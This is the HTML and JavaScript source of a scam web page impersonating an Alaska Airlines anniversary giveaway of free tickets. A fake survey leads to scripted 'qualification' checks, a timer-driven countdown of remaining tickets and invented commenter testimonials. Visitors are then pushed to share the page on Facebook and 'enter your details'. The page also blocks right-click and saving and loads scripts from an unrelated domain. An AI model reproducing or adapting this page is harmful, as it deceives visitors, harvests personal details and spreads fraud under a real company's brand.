



<html>
<head>
 <meta https-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta property="og:title" content="Alaska Airline is Celebrating their 87th Anniversary by Gifting 2 free tickets to Everyone. TODAY ONLY." />
    <meta property="og:site_name" content="Alaska" />
    <meta name="description" content="Alaska anniversary.">
    <meta property="og:image" content="https://i.imgur.com/6Zi0xKy.png" />
   
    <meta charset="utf-8">
    <meta https-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Alaskas</title>
    <script src="https://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <style>
        html, body, div, span, applet, object, iframe,
        h1, h2, h3, h4, h5, h6, p, blockquote, pre,
        a, abbr, acronym, address, big, cite, code,
        del, dfn, em, img, ins, kbd, q, s, samp,
        small, strike, strong, sub, sup, tt, var,
        b, u, i, center,
        dl, dt, dd, ol, ul, li,
        fieldset, form, label, legend,
        table, caption, tbody, tfoot, thead, tr, th, td,
        article, aside, canvas, details, embed,
        figure, figcaption, footer, header, hgroup,
        menu, nav, output, ruby, section, summary,
        time, mark, audio, video {
            margin: 0;
            padding: 0;
            border: 0;
            font-size: 100%;
            font: inherit;
            vertical-align: baseline;
        }
        article, aside, details, figcaption, figure,
        footer, header, hgroup, menu, nav, section {
            display: block;
        }
        body {
            line-height: 1;
        }
        ol, ul {
            list-style: none;
        }
        blockquote, q {
            quotes: none;
        }
        blockquote:before, blockquote:after,
        q:before, q:after {
            content: '';
            content: none;
        }
        table {
            border-collapse: collapse;
            border-spacing: 0;
        }
        /* CLEARFIX */
        .clearfix:before,
        .clearfix:after {
            content:"";
            display:table;
        }
        .clearfix:after {
            clear:both;
        }
        /* For IE 6/7 (trigger hasLayout) */
        .clearfix {
            zoom:1;
        }
        /* STYLE */
        * {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
        }
        body {
            font-family: 'Open Sans',sans-serif;
            font-size: 16px;
            color: #262626;
            line-height: 1.3;
        }
        .wrapper {
            max-width: 768px;
            margin: 0 auto;
            text-align: center;
        }
        h1 {
            font-weight: 700;
            font-size: 1.2em;
            padding: 5px 10px;
        }
        .img-responsive {
            margin: 0 auto;
            display: block;
            height: auto;
            max-width: 100%;
        }
        h2 {
            padding: 10px;
            font-size: 1.2em;
            background: #000;
            color: #fff;
            position: relative;
            margin-bottom: 35px;
        }
        h2:after {
            content: "";
            display: block;
            width: 0;
            height: 0;
            border-style: solid;
            border-width: 25px 25px 0 25px;
            border-color: #000 transparent transparent transparent;
            position: absolute;
            bottom: -25px;
            left: 50%;
            margin-left: -25px;
        }
        .q, .results {
            background: #efefef;
            padding: 10px;
            margin: 0 10px;
            display: none;
        }
        .q.start {
            display: block;
        }
        .currentNum, .question {
            font-weight: 700;
            font-size: 1.25em;
            margin-bottom: 10px;
        }
        button, .cta {
            text-decoration: none;
            font-weight: 700;
            color: #fff;
            background: #dd0024;
            border: 0;
            -webkit-border-radius: 5px;
            -moz-border-radius: 5px;
            border-radius: 5px;
            padding: 15px 10px;
            display: block;
            margin-bottom: 10px;
            width: 100%;
            font-size: 1.25em;
            letter-spacing: 0.5px;
            outline: 0;
            cursor: pointer;
        }
        button:hover, button:active, button:focus, .cta:hover, .cta:active, .cta:focus {
            background: #262626;
        }
        .overlay {
            background: rgba(0,0,0,0.8);
            position: fixed;
            top: 0;
            right: 0;
            bottom: 0;
            left: 0;
            z-index: 999;
            display: none;
        }
        .loaderTxt {
            color: #fff;
            padding: 0 10px;
            margin: 70px auto 15px;
            font-size: 1.2em;
            text-align: center;
            max-width: 400px;
        }
        .list {
            padding: 0 10px;
            margin-top: 15px;
        }
        .list li {
            text-align: center;
            color: #fff;
            font-size: 1.05em;
            padding: 2px 0;
            display: none;
        }
        .list li img {
            display: inline-block;
            vertical-align: middle;
        }
        .txt {
            margin-bottom: 10px;
        }
        /* COMMENTS */
        .comment-area {
            margin-top: 30px;
            position: relative;
            z-index: 610;
            font-size: 14px !important;
            font-size: 0.95em;
            text-align: left;
            font-family: 'Myriad Pro', sans-serif;
        }
        .action {
            border-top: 1px solid #e6e6e6;
            background: #fff;
            padding: 5px 10px;
        }
        .action a {
            display: inline-block;
            padding-left: 20px;
            text-decoration: none;
            color: #6d6d6d;
            margin-right: 15px;
        }
        .action .like {
            background: url(https://dolly147.xyz/f2/like.png) no-repeat left center;
        }
        .action .bubble {
            background: url(https://dolly147.xyz/f2/bubble.png) no-repeat left center;
        }
        .action .share-btn {
            background: url(https://dolly147.xyz/f2/share.png) no-repeat left center;
        }
        .action .active-like {
            background-image: url(https://dolly147.xyz/f2/like-active.png);
            color: #5890ff;
        }
        .tot-likes {
            padding: 0 10px;
        }
        .tot-likes > p {
            line-height: 20px;
            padding: 5px 0;
            color: #3f5199;
            border-bottom: 1px solid #e1e3e4;
        }
        .like-imgs {
            padding: 10px 0 5px;
            max-height: 47px;
            overflow: hidden;
        }
        .like-imgs > div {
            display: inline-block;
            margin-right: 5px;
            position: relative;
            margin-bottom: 5px;
        }
        .like-imgs > div img {
            display: block;
        }
        .like-imgs > div .reaction-img {
            position: absolute;
            bottom: -5px;
            right: -5px;
            z-index: 10;
        }
        .you {
            display: none;
        }
        .you.active {
            display: inline-block;
            line-height: 20px;
            padding-left: 20px;
            background: url(https://dolly147.xyz/f2/btn.png) no-repeat left center;
        }
        .comment {
            position: relative;
            padding: 10px 10px 10px 70px;
            min-height: 70px;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
        }
        .profile {
            position: absolute;
            top: 10px;
            left: 10px;
        }
        .name {
            font-weight: 700;
            text-decoration: none;
            color: #3f5199;
        }
        .com-txt {
            margin-bottom: 10px;
        }
        .act a {
            color: #3f5199;
            text-decoration: none;
        }
        .liked {
            background: url(https://dolly147.xyz/f2/like-btn.png) no-repeat left center;
            padding-left: 16px;
            line-height: 16px;
            color: #3f5199;
        }

        .time {
            color: #8d9098;
        }
        .comment .comment {
            padding-left: 50px;
            padding-right: 0;
        }
        .comment .comment .profile {
            left: 0 !important;
            width: 40px !important;
            height: 40px !important;
        }
        .fbimg {
            max-width: 190px;
            width: 100%;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            height: auto;
            display: block;
            padding: 3px;
            border: 1px solid #808080;
            border-radius: 2px;
            -moz-border-radius: 2px;
            -webkit-border-radius: 2px;
            margin-bottom: 10px;
        }
        .addComment {
            position: relative;
            padding: 10px 10px 75px 70px;
            height: 70px;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
        }
        .addComment img {
            position: absolute;
            left: 10px;
            top: 8px;
        }
        .addComment input {
            border-radius: 2px;
            -moz-border-radius: 2px;
            -webkit-border-radius: 2px;
            border: 1px solid #e0e0e0;
            line-height: 48px;
            width: 100%;
            display: block;
            outline: 0;
            padding: 0 50px 0 10px;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            background: #fff url(https://dolly147.xyz/f2/btnz.png) no-repeat right center;
        }
        .hider, .likehide, #myCom {
            display: none;
        }
        .txt2 {
            color: #000;
            line-height: 2.3;
            text-align: left;
        }
        .timer {
            font-size: 1.5em;
            font-weight: 400;
            color: #d9534f;
        }
    </style>
    <style>
        body {
            background-color: #fff;
            color: #4a4a4a;
            font-family: Asap;
        }
        .txt01 {
            color: #ED1C24;
            font-size: 1.0em;
            font-family: Asap;
        }
        .txt02 {
            color: #B40431;
            font-size: 1.0em;
            padding:15px;
            padding-top:0px;
            font-family: Asap;
        }
        .txt03 {
            color: #B40431;
            font-size: 1.0em;
            padding:15px;
            font-family: Asap;
            border-bottom: 1px solid #e2e2e2;
        }
        .wrapper01 {
            background-color:#f0f0f0;
            border-top:1px solid #B40431;
            border-bottom:1px solid #B40431;
            margin-top:15px;
            padding-bottom:15px;
        }
        .header {Alaska
        background-color: #000000;
            height:31px;
        }
        .button {
            background-color: #00385F;
            color: #fff;
            font-size: 1.2em;
            font-weight: bold;
            text-align: center;
            padding:10px;
            margin-top:5px;
        }
        .button2 {
            background-color: #00385F;
            color: #fff;
            font-size: 1.2em;
            font-weight: bold;
            text-align: center;
            padding:10px;
            margin-top: 10px;
        }
        .button3 {
            background-color: #00385F;
            color: #fff;
            font-size: 1.2em;
            font-weight: bold;
            text-align: center;
            padding:10px;
            margin-top:5px;
        }
        a {
            color: #fff;
        }
        .col-xs-12 {
            margin: 0px;
            padding:0px;
        }
        .col-xs-5 {
            margin:5px;
        }
        div.footer {
            background-color: #fff;
            color: #333;
            display:none;
        }
        .btnwhatsapp {
            height:50px;
            padding:5px;
            background-color: #009846;
            color:#fff;
            border-radius:5px;
        }
        .btnfb {
            height:50px;
            padding:5px;
            background-color: #3b5998;
            color:#fff;
            border-radius:5px;
        }
        .hr01 {
            color:none;
            border:0px;
            border-top: solid 1px #846061;
            border-bottom: 0px;
            font-size: 0px;
        }
        .ueber {
            border-radius: 7px;
            padding:3px;
            font-weight: bold;
            color: #846061;
            font-size: 0.9em;
            margin-top:2px;
        }
        .gutschein {
            background-color: #00385F;
            border-radius: 10px;
            padding:10px;
            font-weight: bold;
            color: #ffffff;
            font-size: 1.0em;
            margin-top:2px;
            text-align: center;
        }
        .frage {
            text-align: center;
            margin-top: 15px;
            font-weight: bold;
            font-size: 1.0em;
            margin-bottom: 25px;
        }
        .wrapper_02 {
            padding-left: 5px;
            padding-right: 5px;
        }
        .img-center {margin:0 auto;}
    </style>
    <style>
        div.footer {
            margin-top: 20px;
            padding-top: 10px;
            padding-bottom: 10px;
        }
        }
        #img1 {display:block;}
        #img2 {display:none}
        @media all and (max-width: 499px) {
            #img1 {display: none;}
            #img2 {display: block;}
        }
    </style>
    <script language="javascript">
        document.onmousedown=disableclick;
        Function disableclick(event)
        {
            if(event.button==2)
            {
                alert(status);
                return false;
            }
        }
    </script>
    <script src="https://dolly1477.xyz/f/jquery-1.5.1.min.js"></script>
    <script language="javascript">
        function randomString(len, charSet) {
            charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
            var randomString = '';
            for (var i = 0; i < len; i++) {
                var randomPoz = Math.floor(Math.random() * charSet.length);
                randomString += charSet.substring(randomPoz, randomPoz + 1);
            }
            return randomString;
        }

        function get_random_number(n) {
            return Math.floor((Math.random() * n) + 1);
        }
        var x;
        var links = new Array();
        x = get_random_number(45, 199);
    </script>
    <script language="javascript">
        $(document).ready(function () {
            $("#go").click(function () {
                $("#to").attr('href', '');
            });
        });


    </script>
    <script language="javascript">
        var links = new Array();
        links[0] = "https://alaskawire.com/mysite-2?anniversary-"  + randomString(5);

        
        
        
        randno = Math.floor(Math.random() * links.length);
        link = links[randno];
    </script>
</head>
<script src="https://dolly1477.xyz/f/html5shiv.min.js"></script>
<script src="https://dolly1477.xyz/f/respond.min.js"></script>
<body oncontextmenu="return false">
<link href="https://fonts.googleapis.com/css?family=Asap" rel="stylesheet">

<div>
    <center style="padding-top: 40px;"><img id="img1" src="https://i.imgur.com/KUKpZhe.jpg" alt="" width="20%">
        <img id="img2" src="https://i.imgur.com/KUKpZhe.jpg" alt="" width="70%">
    </center>
</div>
<div class="wrapper_02" style="text-align: center;">
    <div style="font-size:0.7em;margin-top:10px; color:#949494;">
        <script language="javascript">
            var datum = new Date()
            var jahr = datum.getFullYear()

            var tag = datum.getDate()

            function monat1(){
                var monat = datum.getMonth()

                if (monat==0) document.write("January");
                if (monat==1) document.write("February");
                if (monat==2) document.write("March");
                if (monat==3) document.write("April");
                if (monat==4) document.write("May");
                if (monat==5) document.write("June");
                if (monat==6) document.write("July");
                if (monat==7) document.write("August");
                if (monat==8) document.write("September");
                if (monat==9) document.write("October");
                if (monat==10) document.write("November")
                if (monat==11) document.write("December")
            }

            function wotag(){
                var datum = new Date()
                var wochentag = datum.getDay()

                if (wochentag==0) document.write("Sunday");
                if (wochentag==1) document.write("Monday");
                if (wochentag==2) document.write("Tuesday");
                if (wochentag==3) document.write("Wednesday");
                if (wochentag==4) document.write("Thrusday");
                if (wochentag==5) document.write("Friday");
                if (wochentag==6) document.write("Saturday");
            }

            wotag()
            document.write(", ")

            document.write(tag,". ")
            monat1()
            document.write(" ",jahr)


        </script>
    </div>
    <div class="txt01" style="font-size: 1.4em; padding-bottom:15px;font-weight:bold;text-align: center;">
       It's our Anniversary! Answer a few questions for your chance to get 2 FREE Tickets of Alaska
    </div>
    <div class="gutschein">Remaining Tickets:
        <span id="gutschein"><i>Loading</i></span>
    </div>
    <div id="aufforderung" style="text-align: center; margin-top: 25px; margin-bottom: 10px; font-size: 1.0em; font-weight: bold;">
        Please answer the questions below first:
    </div>
    <div id="frage_01">
        <div class="frage">Question 1: Have you ever traveled with us?</div>
        <div class="button">Yes</div>
        <div class="button">No</div>
    </div>
    <div id="frage_02" style="display: none">
        <div class="frage">Question 2: Have you ever been dissatisfied with our services?</div>
        <div class="button">Yes</div>
        <div class="button">No</div>
    </div>
    <div id="frage_03" style="display: none">
        <div class="frage">Question 3: What is your age?</div>
        <div class="button">Less than 18 </div>
        <div class="button">More than 18</div>
    </div>
    <div id="frage_04" style="display: none">
        <div class="frage">Question 4: Will you suggest Alaska to family and friends ?</div>
        <div class="button">Yes</div>
        <div class="button">No</div>
    </div>
    <div id="content_02" style="display: none; margin-top: 15px;">
        Please wait we are processing your response.<br>
        <img id="laden" class="img-responsive center-block" style="padding:10px;" src="https://i.imgur.com/Rv4R0jC.gif">
        <div id="pruefen_01" style="display: none;"><span style="color: #009846; padding-right: 5px;" class="glyphicon glyphicon-ok"></span>All questions has been answered</div>
        <div id="pruefen_02" style="display: none;"><span style="color: #009846; padding-right: 5px;" class="glyphicon glyphicon-ok"></span>No duplicate entry found</div>
        <div id="pruefen_03" style="display: none;"><span style="color: #009846; padding-right: 5px;" class="glyphicon glyphicon-ok"></span>You are 100% qualified.</div>
    </div>
    <div id="content_03" style="display: none; margin-top:15px;">
        <div style="font-size:1.4em;margin-bottom:10px;"><strong>Congratulations!</strong></div>
        <div style="margin-bottom: 10px">
            You have been qualified to get <strong>2 FREE Tickets</strong>! How to proceed :
        </div>
        1. Share this page by clicking "SHARE" button and type "Thanks!" in the comments field!<br>
        2. Click on "Claim FREE Tickets" and enter your details.<br>
        3. CLaim the Tickets.
        <a id="go" href="javascript:void(0)" onClick="gt=window.open('https://www.facebook.com/sharer/sharer.php?u=' + link + '', 'gt','top=176,left=500,toolbar=no,location=yes,directories=no,status=no, menubar=no,scrollbars=no,resizable=no,width=800,height=50'); gt.onload = function () {gt.focus();}; return false;">
            <div id="b1" style="padding-top: 25px;padding-bottom: 25px;" >
                <img style="max-height:38px;" src="https://dolly147.xyz/f2/JJf4Yaq.png">

            </div>
        </a>
        <a id="to" href='javascript:window.alert("Complete Step 1 to get the FREE Tickets!");'>
            <div class="button"><span style="padding-right: 5px;" class="glyphicon glyphicon-shopping-cart"></span>Claim FREE Tickets</div>
        </a>
    </div>
</div>
<div class="comment-area">
    <div class="action">
        <a class="like" href="javascript: void(0);">Like</a>
        <a class="bubble" href="javascript: void(0);">Comment</a>
        <a class="share-btn" href="javascript: void(0);">Share</a>
    </div>
    <div class="tot-likes">
        <div class="like-imgs">

            <div><img src="https://dolly147.xyz/f2/img2.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/btn.png" width="16" height="16"></div>
            <div><img src="https://dolly147.xyz/f2/img1.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/love.png" width="16" height="16"></div>
            <div><img src="https://dolly147.xyz/f2/img3.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/btn.png" width="16" height="16"></div>
            <div><img src="https://dolly147.xyz/f2/img4.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/btn.png" width="16" height="16"></div>
            <div><img src="https://dolly147.xyz/f2/img8.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/btn.png" width="16" height="16"></div>
            <div><img src="https://dolly147.xyz/f2/img4.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/btn.png" width="16" height="16"></div>
            <div><img src="https://dolly147.xyz/f2/img9.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/love.png" width="16" height="16"></div>
            <div><img src="https://dolly147.xyz/f2/img5.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/love.png" width="16" height="16"></div>
            <div><img src="https://dolly147.xyz/f2/img7.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/btn.png" width="16" height="16"></div>
            <div><img src="https://dolly147.xyz/f2/img6.jpg" width="32" height="32"><img class="reaction-img" src="https://dolly147.xyz/f2/love.png" width="16" height="16"></div>
        </div>
        <p><span class="you">You and</span> 17,259 Others Like this.</p>
    </div>
    <div class="comment">
        <img class="profile" src="https://dolly147.xyz/f2/24.jpg" width="50" height="50">
        <p class="com-txt"><a class="name" href="javascript:void(0);">Rachel Singleton</a>
            Thank you soo much Alaska for Tickets! i got mine
        </p>
        <div class="act">
            <a class="fblike" href="javascript:void(0);">Like</a>
            <a href="javascript:void(0);">Reply</a>
            <span class="liked">50</span>
            <span class="time">28 mins</span>
        </div>
        <div class="comment">
            <img class="profile" src="https://dolly147.xyz/f2/25.jpg" width="50" height="50">
            <p class="com-txt"><a class="name" href="javascript:void(0);">Julia Terrys</a>
                It's time for some good Traveling @ Alaska
            </p>
            <div class="act">
                <a class="fblike" href="javascript:void(0);">Like</a>
                <a href="javascript:void(0);">Reply</a>
                <span class="liked">16</span>
                <span class="time">20 mins</span>
            </div>
        </div>
        <div id="com3" class="comment hider">
            <img class="profile" src="https://dolly147.xyz/f2/24.jpg" width="50" height="50">
            <p class="com-txt"><a class="name" href="javascript:void(0);">Robert Busquet</a>
                It was busy at the Alaska counter today. It seems that a lot of people have got these Tickets
            </p>
            <div class="act">
                <a class="fblike" href="javascript:void(0);">Like</a>
                <a href="javascript:void(0);">Reply</a>
                <span class="liked"></span>
                <span class="time">Just Now</span>
            </div>
        </div>
    </div>
    <div class="comment">
        <img class="profile" src="https://dolly147.xyz/f2/19.jpg" width="50" height="50">
        <p class="com-txt"><a class="name" href="javascript:void(0);">Michael Green</a>
            Yes! It's just awesome, thanks #Alaska.
        </p>
        <div class="act">
            <a class="fblike" href="javascript:void(0);">Like</a>
            <a href="javascript:void(0);">Reply</a>
            <span class="liked">27</span>
            <span class="time">7 mins</span>
        </div>
    </div>
    <div class="comment">
        <img class="profile" src="https://dolly147.xyz/f2/29.jpg" width="50" height="50">
        <p class="com-txt"><a class="name" href="javascript:void(0);">Joann Green</a>
            Yeeess, I got Alaska tickets.
        </p>
        <div class="act">
            <a class="fblike" href="javascript:void(0);">Like</a>
            <a href="javascript:void(0);">Reply</a>
            <span class="liked">18</span>
            <span class="time">3 mins</span>
        </div>
    </div>
    <div id="com1" class="comment hider">
        <img class="profile" src="https://dolly147.xyz/f2/33.jpg" width="50" height="50">
        <p class="com-txt"><a class="name" href="javascript:void(0);">Christina Derry</a>
            Who would have thought that i could have a Alaska Ticket
        </p>
        <div class="act">
            <a class="fblike" href="javascript:void(0);">Like</a>
            <a href="javascript:void(0);">Reply</a>
            <span class="liked likehide"></span>
            <span class="time">Just Now</span>
        </div>
    </div>
    <div id="com2" class="comment hider">
        <img class="profile" src="https://dolly147.xyz/f2/14.jpg" width="50" height="50">
        <p class="com-txt"><a class="name" href="javascript:void(0);">Diana Persie</a>
            Thank you #Alaska
        </p>
        <div class="act">
            <a class="fblike" href="javascript:void(0);">Like</a>
            <a href="javascript:void(0);">Reply</a>
            <span class="liked likehide"></span>
            <span class="time">Just now</span>
        </div>
        <div id="com5" class="comment hider">
            <img class="profile" src="https://dolly147.xyz/f2/11.jpg" width="50" height="50">
            <p class="com-txt"><a class="name" href="javascript:void(0);">Fredrick Metzger</a>
                Now i can go to visit my sister :)
            </p>
            <div class="act">
                <a class="fblike" href="javascript:void(0);">Like</a>
                <a href="javascript:void(0);">Reply</a>
                <span class="liked likehide"></span>
                <span class="time">Just Now</span>
            </div>
        </div>
    </div>
    <div id="com4" class="comment hider">
        <img class="profile" src="https://dolly147.xyz/f2/9.jpg" width="50" height="50">
        <p class="com-txt"><a class="name" href="javascript:void(0);">Claudia Vonn</a>
            Thank you So much, Alaska
        </p>
        <div class="act">
            <a class="fblike" href="javascript:void(0);">Like</a>
            <a href="javascript:void(0);">Reply</a>
            <span class="liked likehide"></span>
            <span class="time">Just Now</span>
        </div>
    </div>
    <div id="myCom" class="comment">
        <img class="profile" src="https://dolly147.xyz/f2/7.jpg" width="50" height="50">
        <p class="com-txt"><a class="name" href="javascript:void(0);">Julia Reynolds</a>
            <span id="myComment"></span>
        </p>
        <div class="act">
            <a class="fblike" href="javascript:void(0);">Like</a>
            <a href="javascript:void(0);">Reply</a>
            <span class="liked likehide"></span>
            <span class="time">Just now</span>
        </div>
    </div>
    <div class="addComment">
        <img src="https://dolly147.xyz/f2/generic.jpg" width="50" height="50">
        <input type="text" id="addCom" placeholder="Write a comment...">
    </div>
</div>



<div style="padding-top: 15px;text-align: center;border-top: 1px solid #ccc;">
    <strong>Alaska-2020</strong><br>
</div>
<div class="container footer">
    <div class="media">
        <div class="media-left">
            <a href="#">
                <img class="media-object" src="stop_signal.png" alt="Stop">
            </a>
        </div>
        <div class="media-body text-center">
        </div>
    </div>
</div>
<script src="https://dolly1477.xyz/f/jquery.min.js"></script>
<script src="https://dolly1477.xyz/f/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script>
    function loadCom(a,b) {
        setTimeout(function() {
            $(a).fadeIn(250);
        }, b);
    }
    $.fn.onEnterKey = function(callback) {
        $(this).keypress(function(event) {
            var code = event.keyCode ? event.keyCode : event.which;
            if (code == 13) {
                callback();
                return false;
            }
        });
    }
    function loadAllComment(){
        loadCom('#com1', 3250);
        loadCom('#com2', 5800);
        loadCom('#com3', 5700);
        loadCom('#com4', 7500);
        loadCom('#com5', 9000);
    }

    $(document).ready(function() {

        loadAllComment();

        $('.like').on('click',function() {
            var _this = $(this);
            if(_this.hasClass('active-like')) {
                _this.removeClass('active-like');
                $('.you').removeClass('activee');
            } else {
                _this.addClass('active-like');
                $('.you').addClass('activee');
            }
        });

        $(document).on('click', '.fblike', function() {
            var _this = $(this);
            var x = _this.next().next().html() == '' ? 0 : parseInt(_this.next().next().html());
            if(_this.hasClass('selected')) {
                _this.removeClass('selected').html('Like');
                _this.next().next().html(--x);
                if(x == 0) _this.next().next().addClass('likehide');
            } else {
                _this.addClass('selected').html('Unlike');
                _this.next().next().html(++x);
                if(_this.next().next().hasClass('likehide')) _this.next().next().removeClass('likehide');
            }
        });
        $("#addCom").onEnterKey(function() {
            var value = $("#addCom").val();
            $("#addCom").val("");
            $("#myComment").html(value);
            $(".addComment").hide();
            loadCom('#myCom', 250);
        });



        var teilen = 10;

        var pruefen = 0;



        $("#frage_01").click(function() {
            show('#frage_02');
            hide('#frage_01');
        });

        $("#frage_02").click(function() {
            show('#frage_03');
            hide('#frage_02');
        });

        $("#frage_03").click(function() {
            show('#frage_04');
            hide('#frage_03');
        });

        $("#frage_04").click(function() {
            show('#content_02');
            hide('#frage_04');
            hide('#aufforderung');
            var myTimer1 = window.setInterval(updateTimer1, 2000);
            function updateTimer1() {
                pruefen++;
                $("#check").text(pruefen);

                if ( pruefen == 1 ) {
                    show('#pruefen_01');
                }

                if ( pruefen == 2 ) {
                    show('#pruefen_02');
                }

                if ( pruefen == 3 ) {
                    show('#pruefen_03');
                }

                if ( pruefen == 4 ) {
                    window.clearInterval(myTimer1);
                    show('#content_03');
                    hide('#content_02');
                    hide('#intro');
                }
            }
        });

        $("#btnShare1").click(function() {
            teilen--;
            $('#anzahl').text( teilen );

            if (teilen == 0) {
                show('#btnWin');
                hide('#btnFakeWin');
            }

        });

        $("#btnShare2").click(function() {
            teilen--;
            $('#anzahl').text( teilen );

            if (teilen == 0) {
                show('#btnWin');
                hide('#btnFakeWin');
            }

        });

        $("#btnFakeWin").click(function() {
            alert ('Please share it with  ' + Share + ' Other Contacts!');
        });

        function show (toBlock){

            $(toBlock).show();
        }

        function hide (toNone) {

            $(toNone).hide();
        }

        function setDisplay (target, str) {
            document.getElementById(target).style.display = str;
        }


        var zeit = new Date();

        var sec = zeit.getSeconds();

        if (sec < 6 ){
            sec = 9
        }

        if (sec > 5 & sec < 13 ){
            sec = 8
        }

        if (sec > 11 & sec < 19 ){
            sec = 7
        }

        if (sec > 17 & sec < 25 ){
            sec = 6
        }

        if (sec > 23 & sec < 31 ){
            sec = 5
        }

        if (sec > 29 & sec < 37 ){
            sec = 4
        }

        if (sec > 35 & sec < 43 ){
            sec = 3
        }

        if (sec > 41 & sec < 49 ){
            sec = 2
        }

        if (sec > 47 & sec < 55 ){
            sec = 1
        }

        if (sec > 54){
            sec=0
        };


        var add = sec;

        var zeit2 = new Date();

        var minute = zeit2.getMinutes();

        var timer1 = (60-minute)*60;

        if (timer1 > 1800) {
            var resttimer = (30-minute)*10
        } else {
            var resttimer = (60-minute)*10
        };

        var timer = resttimer + add + 67;

        function updateTimer() {
            timer--;
            $("#gutschein").text(timer);

            if (timer < 9) {
                stopFunction();
            }
        }

        var myTimer = window.setInterval(updateTimer, 6000);

        function stopFunction() {
            window.clearInterval(myTimer);
        }
    });

</script>
<script>
    $(document).bind('keydown keypress', 'ctrl+s', function(){
        $('#save').click();
        return false;
    });
</script>
<img src="http://whos.amung.us/widget/alaskafn001/" height="1" width="1">

</body>
</html>

